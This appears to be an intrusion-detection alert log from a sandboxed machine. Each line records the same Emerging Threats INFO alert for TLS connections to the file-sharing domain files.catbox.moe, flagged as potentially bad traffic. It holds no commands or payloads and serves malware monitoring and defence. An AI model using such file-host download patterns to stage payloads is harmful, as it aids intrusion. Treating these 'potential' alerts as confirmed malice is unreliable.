TCP 192.168.56.101:49477 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49451 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49304 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49353 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49520 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49473 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49430 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49234 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49238 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49450 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49399 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49254 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49428 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49441 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49503 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49327 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49278 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49250 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49383 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49329 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49301 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49326 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49464 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49429 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49403 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49427 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49462 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49363 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49411 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49300 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49288 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49253 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49348 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49303 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49298 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49490 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49341 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49401 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49242 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49455 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49260 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49219 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49466 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49508 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49460 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49405 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49246 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49218 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49376 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49323 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49372 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49212 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49419 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49463 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49349 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49432 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49221 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49294 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49445 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49324 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49507 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49472 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49340 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49239 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49370 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49295 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49271 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49471 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49252 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49380 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49487 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49459 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49359 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49199 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49417 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49518 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49202 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49312 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49443 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49442 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49485 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49511 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49479 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49402 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49458 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49350 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49206 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49339 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49491 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49196 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49396 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49261 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49351 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49338 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49229 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49381 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49438 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49457 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49282 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49314 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49333 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49352 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49515 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49407 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49366 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49309 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49484 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49389 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49476 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49454 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49299 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49501 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49393 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49384 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49517 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49289 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49475 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49216 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49465 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49273 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49225 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49440 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49373 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49420 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49422 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49305 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49343 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49241 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49414 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49397 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49302 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49409 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49236 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49369 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49325 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49240 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49412 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49319 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49446 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49195 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49281 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49290 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49197 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49285 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49467 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49378 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49478 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49330 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49263 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49328 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49267 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49516 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49368 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49291 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49379 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49276 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49493 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49211 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49313 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49264 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49496 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49398 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49315 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49283 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49293 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49400 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49509 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49284 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49317 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49265 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49322 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49208 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49495 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49504 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49311 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
